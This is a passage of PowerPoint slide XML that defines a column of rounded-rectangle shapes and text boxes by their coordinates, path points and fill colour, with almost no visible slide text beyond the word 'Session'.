                    <a:pt x="3741419" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46736" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D0EBBC-A948-7C69-475D-D7567E2457F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786386" y="1683501"/>
            <a:ext cx="1337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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{792E08CE-2380-5991-36BB-9065634148A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="2142859"/>
            <a:ext cx="3741420" cy="469900"/>
            <a:chOff x="4458462" y="2141981"/>
            <a:chExt cx="3741420" cy="469900"/>
          </a:xfrm>
        </p:grpSpPr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BC742C75-6BD7-2CA3-E701-CC64F98FF9B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="2141981"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="3694430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430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3A91DAE9-C29D-12BC-B499-B88015FCE24B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="2141981"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="46990"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4699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2" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539348B9-C6F0-9C3E-1108-E5065A411CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057659" y="2180655"/>
            <a:ext cx="7931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Session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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91D86E5-7368-1E90-5AAA-06CC68A8C807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="2641207"/>
            <a:ext cx="3741420" cy="467995"/>
            <a:chOff x="4458462" y="2640329"/>
            <a:chExt cx="3741420" cy="467995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33435892-7AFA-7295-8FBB-0A6E589B2AEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="2640329"/>
              <a:ext cx="3741420" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="467994">
                  <a:moveTo>
                    <a:pt x="3694684" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46736" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46736" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684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1" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D556FE-3822-A06B-6ECB-5677646A0363}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="2640329"/>
              <a:ext cx="3741420" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="467994">
                  <a:moveTo>
                    <a:pt x="0" y="46736"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3677" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46736" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46736" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46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4" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A79BEAA-EE37-7B24-9CD8-B6E4C1F64774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947930" y="2678673"/>
            <a:ext cx="1014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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A7A4EA-B905-0359-C70F-8433BE6534B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="3138031"/>
            <a:ext cx="3741420" cy="469900"/>
            <a:chOff x="4458462" y="3137153"/>
            <a:chExt cx="3741420" cy="469900"/>
          </a:xfrm>
        </p:grpSpPr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510818CD-5EC1-B96C-0A34-8AD8599BEE36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="3137153"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="3694430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430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BAA085A6-1CFC-7ECD-BF14-9E9346E8E08F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="3137153"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="46989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469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6" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41095206-F88D-67F1-E5F1-9968443A6875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996698" y="3176386"/>
            <a:ext cx="918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7" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{809461E9-2501-88CD-905A-7FE5895E65BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="3634855"/>
            <a:ext cx="3741420" cy="469900"/>
            <a:chOff x="4458462" y="3633977"/>
            <a:chExt cx="3741420" cy="469900"/>
          </a:xfrm>
        </p:grpSpPr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902E7A66-14C4-4619-F996-C85F6E88A6CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="3633977"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="3694430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430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A55D0603-5323-1D22-9291-DA0D2FB16F0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="3633977"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="46990"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4699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8" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5CCF0A-AA33-B1D8-C5AE-078B75025681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5966218" y="3674124"/>
            <a:ext cx="9766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9" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E376E5B8-2417-7769-A39B-1230F02222EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="4133203"/>
            <a:ext cx="3741420" cy="469900"/>
            <a:chOff x="4458462" y="4132325"/>
            <a:chExt cx="3741420" cy="469900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF6BC85-997F-CEB1-29EB-7F55F697D176}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="4132325"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="3694430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF151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5" name="object 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9F0B04A-539D-EFCE-EE43-FA7959F52361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="4132325"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="46939"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46939"/>
                  </a:lnTo>
                  <a:lnTo>
